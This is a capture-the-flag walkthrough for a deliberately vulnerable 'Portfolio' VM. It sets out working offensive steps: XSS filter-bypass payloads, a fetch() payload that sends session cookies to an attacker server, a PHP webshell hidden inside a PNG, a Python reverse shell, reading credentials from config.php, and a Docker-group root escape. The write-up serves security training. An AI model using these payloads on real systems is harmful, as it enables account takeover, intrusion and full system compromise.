Skip to main content

CTF: Portfolio Walkthrough


Scenario

A passionate web developer recently launched his personal portfolio website, proudly displaying his projects and sharing his thoughts through a vibrant blog. His focus on design and functionality has left glaring security holes.

As his blog gains popularity, you, a skilled hacker, spot the perfect target. Your mission is clear: exploit the vulnerabilities, compromise his site, and expose his negligence. Every weakness is an opportunity, every oversight a path to control.

In this CTF challenge, you are the hacker. Uncover the flaws, break through the defenses, and leave your mark on the developer’s digital pride.

Welcome to "Portfolio CTF" The game is on. Good luck!

You can download the OVA for the Portfolio CTF from this link

SPOILER ALERT: Do not read further if you intend to solve the CTF challenge on your own. The write-up follows below.


Introduction

I created this Capture The Flag (CTF) machine with dual objectives: to provide a comprehensive training ground for enthusiasts interested in both Client-Side and Server-Side attacks, and to highlight essential skills and vulnerabilities in the cybersecurity field. This machine offers hands-on experience with Stored Cross-Site Scripting (XSS), enabling participants to understand the intricacies of injecting and persistently storing malicious scripts in web applications. It also challenges users to explore File Upload Vulnerabilities, emphasizing the importance of analyzing how servers handle uploaded file content rather than merely checking file extensions. Additionally, the machine encourages the discovery of hardcoded credentials, an essential skill for identifying sensitive information inadvertently left unprotected in code or configuration files. Finally, the Docker group privilege escalation challenge tests participants' problem-solving abilities in a unique way. Overall, this CTF machine delivers a holistic learning experience, equipping participants with critical skills and knowledge for effective cybersecurity practices. It's an excellent preparation tool for the OSCP exam. 

Host Discovery
sudo nmap -sn -vvv -T5 192.168.194.1/24 # 192.168.194.X replace with your NAT network


Enumeration 
Port and Services Enumeration 
export PORTFOLIO=192.168.194.138

Discover all open ports
nmap -p- --open -T4 $PORTFOLIO -oN portfolio.txt

Discover the services running on the open ports 
nmap -p22,80,443 -sCV -T4 $PORTFOLIO -oN portfolio.txt

Add the domain that we discover in the /etc/hosts file 
echo "$PORTFOLIO portfolio.local" | sudo tee -a /etc/hosts



Navigate to the web application 

Inspect the source code of the application and discover the hidden subdomain 

Append the subdomain to the /etc/hosts file

echo "$PORTFOLIO blog.portfolio.local" | sudo tee -a /etc/hosts

Manually exploring the web application

We can see that is a blog application 

There is a login page at /login.php 

There is also a page that we can write a post to the blog at /post.php

Identifying Vulnerabilities 

Let's try to trigger an XSS 

<script>alert('XSS')</script>


We can see that there is some kind of filtering, let's try different html tags in order to trigger the XSS 

Let's try the <img> tag 

<img src="x" onerror="alert('XSS')"/>

We can see that the image tag is filtered as well.

Let's try the <svg> tag

<svg xmlns='' onload='alert("XSS")'/>

We can see that we successfully triggered an XSS attack!

Foothold

Web Application Privilege Escalation (Stealing Session Cookies)

To steal a session cookie we must launch a server and craft a xss payload in order to send as the session cookie.

Launch a python server 

python3 -m http.server 8080

Crafting the XSS payload 

<svg xmlns='' onload='fetch("http://[REDACTED]:8080/exfil?cookies=" + encodeURIComponent(document.cookie))'/>

Stealing the session cookie 

Storing the session cookie to our browser and login to the web application as admin 


Enumerating Admin Portal 

We can see that exists an upload file functionality lets try to upload a php webshell

PHP web shell 

Trying to upload the php webshell 

We receive 2 errors, that the file is not an image and that only jpg and png files are allowed. 

Upload file vulnerability 

Launch Burp Suite 

burpsuite &

Open Burp Suite browser an put the admin session cookie in it 

Try to upload the web.php shell we tried earlier 

Navigate to the Target > Site map find the POST request to the upload page and send it to the Repeater

Bypassing extension 

We can bypass the extension by uploading the web shell with the name web.jpg.php

We can see that we received a different error message that the file is not an image.

Bypassing file type check 

Find an image.png

Find the webshell we want to use 

Create the malicious image by concatenating the image with the web shell and appending them to a new file called image.png.php

cat image.png web.php > image.png.php

Uploading the malicious image

We see that the image uploaded successfully 

Navigate to the folder that the web shell is stored 

We can see that we have RCE to the target machine. 

Getting a reverse shell 

Start a reverse listener 

nc -lvnp 1337

Sending a python reverse shell to the target 

export RHOST="[REDACTED]";export RPORT=1337;python3 -c 'import
sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));
[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

Stabilizing our shell 

python3 -c 'import pty;pty.spawn("/bin/bash")'

^Z

stty -echo raw && fg

export TERM=xterm


Privilege Escalation 

From www-data to gpapadopoulos

Check our permissions 

id

Enumerate users 

cat /etc/passwd

List the files of the current directory 

ls -l

cd ../

ls

See config file config.php

cat config.php

We can see that there is the password of the user gpapadopoulos

Login to gpapadopoulos

su - gpapadopoulos # with password Ju5t_4_d3v_mak1ng_s0ftwar3

Get the user flag user.txt

cat user.txt

SSH to gpapadopoulos

ssh gpapadopoulos@portfolio.local

From gpapadopoulos to root

Enumerating system manually 

id

We can see that user gpapadopoulos is in the docker group 

Get a root shell 

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Get the root flag 

cat root.txt